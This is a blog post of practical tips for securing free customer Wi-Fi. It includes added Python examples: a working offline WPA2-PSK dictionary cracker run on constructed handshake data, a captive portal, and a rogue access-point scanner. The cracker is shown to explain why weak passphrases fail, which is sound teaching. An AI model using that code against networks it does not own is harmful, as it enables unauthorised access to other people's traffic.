7 practices for securing customer facing wi fi



http://chrisvarnom.com/safety-7-practices-for-securing-customer-facing-wi-fi/

Safety: 7 Practices for Securing Customer-Facing Wi-Fi Author - Chris Varnom at chrisvarnom.com

To be notified of my latest posts please subscribe to my newsletter and to receive free stuff at http://chrisvarnom.com/newsletter/

Ok, so your boss has just decided that it’s time to hang a “Free Wi-Fi” sign on the door and now it’s your job to make it happen. At first glance this looks like a simple task: buy a business-class router, negotiate a contract with your Internet service provider (ISP) for adequate bandwidth, and voila, job done. What could possibly go wrong?

Well, as you’re about to find out, from an IT security perspective, quite a lot.

The problems can begin right at the setup stage. The default settings of Wi-Fi routers straight out of the box aren’t secure. Unless you encrypt your network, anyone within radio range of the router can join it and read the traffic of everyone else using it. If you’re lucky, they will just use your free wireless Internet access for browsing and downloading. Even this innocent use can pose a problem, as it eats into your bandwidth allowance and slows your own access to applications and websites. Worse still, people with bad intentions can reach your PCs and file servers over the same network, hijack any account whose session is not protected by SSL/TLS (HTTPS), or capture passwords sent in the clear. That includes Facebook and Twitter accounts and popular web email clients whenever they are used over plain HTTP.

And unfortunately, even protecting your Wi-Fi network with the ever popular Wi-Fi Protected Access (WPA) encryption, a former standard, and one still in widespread use today, doesn’t keep out people intent on breaking into your network. WPA’s original TKIP cipher was shown to be attackable several years ago, and any WPA or WPA2 network protected by a shared passphrase can be attacked offline: an attacker records a single client’s four-way handshake and then tries candidate passphrases against it at leisure, so a weak passphrase falls to one of the numerous automated programs you can get from Internet sites that boast “hack any Wi-Fi network.”

Unfortunately, this isn’t just about you, it’s also about protecting your customers. The 2013 Identity Fraud Report conducted in the US found that the number of identity fraud victims shot up to 12.6 million consumers in 2013, that’s one out of every 20 U.S. consumers. Cybercriminals are busily “sniffing” for sensitive data over unsecured Wi-Fi connections.

It can get even more complicated depending on the ISP you have. Some big ISPs are automatically turning customers’ cable modems into public Wi-Fi hotspots accessible to anyone with an account login from that ISP, without asking permission. So if you see a hotspot appear in range of your devices labeled “xfinitywifi” or “attwifi,” it might well be originating from your own cable modem.

This is raising hackles as well as security concerns among customers. You need to evaluate carefully whether, instead of being an endpoint on a network, you are okay with being a node on a public network. You will be, unless you opt out, so think about it, make an informed decision, and, if necessary, tell your carrier what you have decided.

Here are seven tips on how to extend Wi-Fi to customers while keeping yourself - and them - secure:

Tip No. 1: Use Enterprise WPA2 encryption. WPA2 is the Wi-Fi Alliance certification for IEEE 802.11i. It encrypts traffic with the Advanced Encryption Standard (AES-CCMP), and in Enterprise mode it authenticates each user through IEEE 802.1X against an authentication server, giving every client its own session keys and, when clients are configured to validate the server’s certificate, mutual authentication between client and network. WPA2 is the stronger big brother of WPA and provides the best Wi-Fi protection to date. But to confuse matters, you can deploy WPA2 in either Personal or Enterprise mode, and most wireless routers support both.

Personal mode (WPA2-PSK) is easier to set up, but every client shares one passphrase, and anyone who captures a client’s four-way handshake can guess at that passphrase offline, so a weak one will be cracked. Enterprise mode avoids the shared secret, but it needs a RADIUS server, which takes time and expertise to set up. Another option is a hosted service that runs WPA2 in Enterprise mode for you. If you do use Personal mode, always create a long and strong passphrase when setting up the encryption, using no words or phrases that might be in a dictionary, and change it whenever someone who knew it leaves.
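To make the Personal-mode risk concrete, here is an added example (written for this page; it is not the author’s code and not taken from any cracking tool) that reproduces the WPA2-PSK key schedule in Python and runs an offline dictionary attack against a four-way handshake. The SSID, MAC addresses, nonces, passphrase and EAPOL frame are all constructed inside the script and the frame layout is simplified; no real network or capture is involved.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Everything below is constructed for this example. The SSID, MAC addresses,
# nonces and passphrase are invented; nothing was captured from a real network.
SSID = "CafeGuest"
TRUE_PASSPHRASE = "latte2013"               # deliberately weak: it appears in the wordlist
AP_MAC = bytes.fromhex("0a1b2c3d4e5f")      # authenticator address (AA)
CLIENT_MAC = bytes.fromhex("5f4e3d2c1b0a")  # supplicant address (SPA)
ANONCE = bytes(range(32))                   # fixed instead of random so the run is reproducible
SNONCE = bytes(range(32, 64))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """Key MIC for AES-CCMP (key descriptor version 2): HMAC-SHA1-128 over the
    EAPOL-Key frame with its MIC field zeroed. The KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def build_capture() -> dict:
    """Simulate what a sniffer sees in message 2 of the four-way handshake: both
    MAC addresses, both nonces, the EAPOL-Key body and its MIC, all sent in the clear.
    The frame bytes are constructed; only the zeroed 16-byte MIC field matters here."""
    pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
    kck = derive_ptk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    eapol = (b"\x02\x03\x00\x75\x02\x01\x0a\x00"    # EAPOL header + key descriptor/info (constructed)
             + b"\x00" * 8 + SNONCE + b"\x00" * 32  # replay counter, SNonce, IV/RSC/ID
             + b"\x00" * 16)                        # MIC field, zero while the MIC is computed
    return {"ssid": SSID, "aa": AP_MAC, "spa": CLIENT_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack_psk(capture: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack. Each candidate costs one PBKDF2 run (4096 HMACs),
    a PTK derivation and one MIC; nothing is sent to the access point, so lockouts
    and rate limits at the AP never see it. Returns the passphrase or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["aa"], capture["spa"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    cap = build_capture()
    # The passphrase never crosses the air, yet four guesses recover it.
    print(crack_psk(cap, ["password", "CafeGuest", "Tr0ub4dor&3", "latte2013"]))  # latte2013
```

Every guess costs 4,096 HMAC-SHA1 iterations, which is slow enough to matter for a long random passphrase and nowhere near slow enough to save one that appears on a wordlist. WPA2 Enterprise sidesteps the problem entirely: there is no shared passphrase to capture and guess.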

Tip No. 2: Create a separate private Wi-Fi network just for guests. You might be tempted, because it’s much easier, to simply let your customers log onto the Wi-Fi network your employees use. Don’t do it. Once on your internal network, cyber criminals can attack supposedly protected file shares and applications and steal data from your company.

To protect your business, create a separate wireless network (its own SSID) for guests. Most business-class routers will let you do this and encrypt it, just as you encrypted your internal Wi-Fi network; put the guest network on its own VLAN or subnet, add a firewall rule that blocks it from reaching internal addresses, and turn on client isolation so that guests cannot see each other’s devices either. If your ISP has already configured your router to send out a second, public signal, theoretically this shouldn’t interfere with your ability to set up a guest network yourself. However, the jury appears to be out on whether it could adversely affect your available bandwidth. Again, consider opting out if you are at all concerned about this.

Tip No. 3: Create a “captive portal” for guests. You don’t want to make it too difficult for your customers to get onto your network, but you should have what’s called a “captive portal”: a page that intercepts a new client’s first web request and requires the user to agree to your terms of service before any traffic is allowed through to the Internet. Although the captive portal’s primary purpose is authenticating users, it offers other benefits. You can create a landing page tailored to your business, hand out access codes that let you tie sessions to individual users, and put traffic controls in place to limit bandwidth per client and expire sessions after a set time.
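A captive portal is easier to reason about once you see the little state it keeps. What follows is an added example for this page (not the author’s code and not any vendor’s portal): a minimal WSGI application in Python that intercepts an unauthorised client, shows the terms, records acceptance against the client’s address for a fixed time, and refuses to redirect off-site. The gateway integration is assumed rather than shown: in practice the router or firewall redirects unauthorised HTTP to this app and consults is_authorized() before forwarding a client’s traffic.

```python
import io
import time
from html import escape
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import parse_qs, quote

TERMS = ("Use of this free Wi-Fi is subject to local law and to our acceptable-use policy; "
         "sessions expire after two hours.")
SESSION_TTL = 2 * 60 * 60


class CaptivePortal:
    """Authorisation table keyed by client address plus the WSGI handler that fills it.
    Assumption: the gateway firewall calls is_authorized() to decide whether to
    forward a client's traffic or intercept it and send it here."""

    def __init__(self, ttl: int = SESSION_TTL, clock: Callable[[], float] = time.time):
        self.ttl = ttl
        self.clock = clock                       # injectable so expiry can be tested
        self._sessions: Dict[str, float] = {}    # client address -> session expiry

    def is_authorized(self, client: str, now: Optional[float] = None) -> bool:
        now = self.clock() if now is None else now
        expiry = self._sessions.get(client)
        if expiry is None:
            return False
        if expiry <= now:
            del self._sessions[client]           # expired: the client must re-accept the terms
            return False
        return True

    def authorize(self, client: str) -> None:
        self._sessions[client] = self.clock() + self.ttl

    def __call__(self, environ, start_response):
        client = environ.get("REMOTE_ADDR", "")
        path = environ.get("PATH_INFO", "/")
        method = environ.get("REQUEST_METHOD", "GET")
        if path == "/portal":
            if method == "POST":
                try:
                    size = int(environ.get("CONTENT_LENGTH") or 0)
                except ValueError:
                    size = 0
                form = parse_qs(environ["wsgi.input"].read(size).decode("utf-8", "replace"))
                dest = form.get("next", ["/"])[0]
                if form.get("accept") == ["yes"]:
                    self.authorize(client)
                    # Only same-site paths: a portal that redirects anywhere is an open redirector.
                    if not dest.startswith("/") or dest.startswith("//"):
                        dest = "/"
                    start_response("303 See Other", [("Location", dest)])
                    return [b""]
                return self._terms_page(start_response, dest, "You must accept the terms to continue.")
            qs = parse_qs(environ.get("QUERY_STRING", ""))
            return self._terms_page(start_response, qs.get("next", ["/"])[0])
        if not self.is_authorized(client):
            # Unauthorised client intercepted by the gateway: bounce it to the terms page.
            start_response("302 Found", [("Location", "/portal?next=" + quote(path))])
            return [b""]
        start_response("200 OK", [("Content-Type", "text/plain")])
        return [b"authorized\n"]

    def _terms_page(self, start_response, dest: str, notice: str = ""):
        body = (
            "<html><body><h1>Free Wi-Fi</h1>"
            f"<p>{escape(TERMS)}</p><p>{escape(notice)}</p>"
            "<form method='post' action='/portal'>"
            f"<input type='hidden' name='next' value='{escape(dest, quote=True)}'>"
            "<label><input type='checkbox' name='accept' value='yes'> I accept the terms</label> "
            "<button>Connect</button></form></body></html>"
        )
        start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
        return [body.encode("utf-8")]


def simulate_request(app, method: str, path: str, client: str,
                     body: bytes = b"", query: str = "") -> Tuple[str, Dict[str, str], bytes]:
    """Drive the WSGI app without a socket; returns (status, headers, body)."""
    captured: Dict[str, object] = {}

    def start_response(status, headers):
        captured["status"] = status
        captured["headers"] = dict(headers)

    environ = {"REQUEST_METHOD": method, "PATH_INFO": path, "REMOTE_ADDR": client,
               "QUERY_STRING": query, "CONTENT_LENGTH": str(len(body)),
               "wsgi.input": io.BytesIO(body)}
    out = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], out


if __name__ == "__main__":
    portal = CaptivePortal()
    print(simulate_request(portal, "GET", "/news", "10.10.0.7")[0])   # 302 Found
    print(simulate_request(portal, "POST", "/portal", "10.10.0.7", b"accept=yes&next=/news")[0])  # 303 See Other
    print(simulate_request(portal, "GET", "/news", "10.10.0.7")[0])   # 200 OK
```

On the gateway this would be served with wsgiref.simple_server.make_server("0.0.0.0", 8080, CaptivePortal()).serve_forever() or any WSGI container. Keying sessions on the client IP is an assumption made to keep the example short; real portals key on the MAC address from the DHCP lease, because guest IPs are recycled and a new device could inherit an old authorisation.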

Tip No. 4: Be aware of other hotspots that appear in the vicinity. “Evil Twin” and “Ad Hoc” hotspots can mimic your network name to trick your customers into connecting to them instead of to you. Once a victim’s device is connected to an Evil Twin, the attacker sits between it and the Internet and can launch a “man in the middle” attack that can be devastating to an individual or a business. Scan regularly for access points advertising your SSID from hardware you don’t own, and for lookalike names.

Again, your ISP might be complicating matters by using your router to create a public hotspot for your area. Although, theoretically, this gives your customers more Wi-Fi choices, it also gives cybercriminals more opportunity to confuse users with rogue networks. If this makes you at all uncomfortable, opt out of your carrier’s use of your router as a public hotspot. Again, if you don’t take any action, your carrier will make you part of its plan to build a national network of public hotspots.
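One way to put this tip into practice is to scan from a spare wireless interface and compare what you see against an inventory of your own access points. The Python below is an added example (not from the original page and not part of the iw project): it parses the output of the Linux tool `iw dev wlan0 scan`, which is assumed here to be the scanner, and flags three kinds of rogue. The scan text is a constructed, abridged sample containing an open twin, an ad hoc twin and a lookalike name.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed, abridged `iw dev wlan0 scan` output for this example (not a real capture).
SAMPLE_SCAN = """\
BSS 0a:1b:2c:3d:4e:5f(on wlan0)
\tfreq: 2437
\tcapability: ESS Privacy ShortSlotTime (0x0411)
\tsignal: -41.00 dBm
\tSSID: CafeGuest
\tRSN:\t * Version: 1
\t\t * Authentication suites: PSK
BSS de:ad:be:ef:00:01(on wlan0)
\tfreq: 2437
\tcapability: ESS ShortSlotTime (0x0401)
\tsignal: -35.00 dBm
\tSSID: CafeGuest
BSS de:ad:be:ef:00:02(on wlan0)
\tfreq: 5180
\tcapability: ESS Privacy (0x0011)
\tsignal: -52.00 dBm
\tSSID: Cafe Guest FREE
\tRSN:\t * Version: 1
\t\t * Authentication suites: PSK
BSS 02:ad:be:ef:00:03(on wlan0)
\tfreq: 2462
\tcapability: IBSS ShortSlotTime (0x0402)
\tsignal: -60.00 dBm
\tSSID: CafeGuest
BSS 0a:1b:2c:3d:4e:60(on wlan0)
\tfreq: 5200
\tcapability: ESS Privacy (0x0011)
\tsignal: -44.00 dBm
\tSSID: CafeStaff
\tRSN:\t * Version: 1
\t\t * Authentication suites: IEEE 802.1X
BSS 11:22:33:44:55:66(on wlan0)
\tfreq: 2412
\tcapability: ESS (0x0001)
\tsignal: -70.00 dBm
\tSSID: xfinitywifi
"""


@dataclass
class BSS:
    bssid: str
    ssid: str = ""
    freq: int = 0
    signal: float = 0.0
    ibss: bool = False        # ad hoc network (IBSS) rather than an access point (ESS)
    encrypted: bool = False   # Privacy capability bit set
    akm: str = ""             # "PSK", "IEEE 802.1X", ... from the RSN element


def parse_iw_scan(text: str) -> List[BSS]:
    """Parse `iw dev <ifname> scan` output into BSS records (only the fields we need)."""
    results: List[BSS] = []
    cur = None
    for raw in text.splitlines():
        m = re.match(r"^BSS ([0-9a-fA-F:]{17})", raw)
        if m:
            cur = BSS(bssid=m.group(1).lower())
            results.append(cur)
            continue
        if cur is None:
            continue
        line = raw.strip()
        if line.startswith("SSID: "):
            cur.ssid = line[len("SSID: "):]
        elif line.startswith("freq: "):
            cur.freq = int(float(line[len("freq: "):]))   # newer iw prints "2437.0"
        elif line.startswith("signal: "):
            cur.signal = float(line.split()[1])
        elif line.startswith("capability: "):
            cur.ibss = "IBSS" in line.split()
            cur.encrypted = "Privacy" in line
        elif line.startswith("* Authentication suites: "):
            cur.akm = line[len("* Authentication suites: "):]
    return results


def _norm(ssid: str) -> str:
    return re.sub(r"[^a-z0-9]", "", ssid.lower())


def find_rogues(scan: List[BSS], authorized: Dict[str, Set[str]]) -> List[Dict[str, object]]:
    """Compare a scan with the inventory of our SSIDs -> BSSIDs. Flags our SSID from an
    unknown BSSID (an evil twin; 'open' if it drops encryption, 'ad hoc' if it is an IBSS)
    and lookalike SSIDs that contain one of ours once case and punctuation are ignored."""
    findings: List[Dict[str, object]] = []
    for bss in scan:
        if not bss.ssid:
            continue                                   # hidden SSID; nothing to compare yet
        if bss.ssid in authorized:
            if bss.bssid in authorized[bss.ssid]:
                continue                               # one of our own access points
            kind = "ad hoc twin" if bss.ibss else ("evil twin" if bss.encrypted else "open evil twin")
            findings.append({"kind": kind, "ssid": bss.ssid, "bssid": bss.bssid,
                             "freq": bss.freq, "signal": bss.signal})
        else:
            like = [ours for ours in authorized if _norm(ours) in _norm(bss.ssid)]
            if like:
                findings.append({"kind": "lookalike", "ssid": bss.ssid, "bssid": bss.bssid,
                                 "freq": bss.freq, "signal": bss.signal, "resembles": like[0]})
    return findings


if __name__ == "__main__":
    inventory = {"CafeGuest": {"0a:1b:2c:3d:4e:5f"}, "CafeStaff": {"0a:1b:2c:3d:4e:60"}}
    for f in find_rogues(parse_iw_scan(SAMPLE_SCAN), inventory):
        print(f)
```

Run it against live output with `iw dev wlan0 scan | python3 rogue_scan.py` after swapping SAMPLE_SCAN for sys.stdin.read(); the inventory of your own BSSIDs is the part only you can supply. A stronger twin from the same BSSID is the one case this cannot see, which is why the signal strength is reported alongside each finding.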

Tip No. 5: Use MAC authentication for your employee network. MAC authentication tightens your employee network further by restricting access to pre-registered devices only. Yes, setup is a bit of a hassle, as you have to register the MAC address of every wireless card, and it will stop casual or accidental connections from unauthorized devices. Treat it as a convenience layer rather than a security control, though: MAC addresses travel in the clear in every frame and can be cloned in seconds, so a determined attacker still has to be stopped by WPA2 Enterprise authentication, not by the MAC list.

Tip No. 6: Don’t let your customers access illegal or offensive sites. You should always block sites with illegal or objectionable content on both your employee and customer Wi-Fi connections to prevent possibly illegal or dubious situations from arising on your premises.

Tip No. 7: Never underestimate your bandwidth needs. Make sure that your equipment (or service provider) allows you to scale up as your users demand more bandwidth. After all, nothing is more frustrating than slow Wi-Fi for either your employees or your customers. ISPs claim that piggybacking on customers’ routers to create public hotspots will not affect those customers’ bandwidth; be on the lookout for degradations in service levels anyway, and be prepared to contact your ISP and complain if you detect any.

By putting the right security measures in place, your business can reap all the benefits of offering Wi-Fi to customers while protecting both your own data and applications and those of your customers.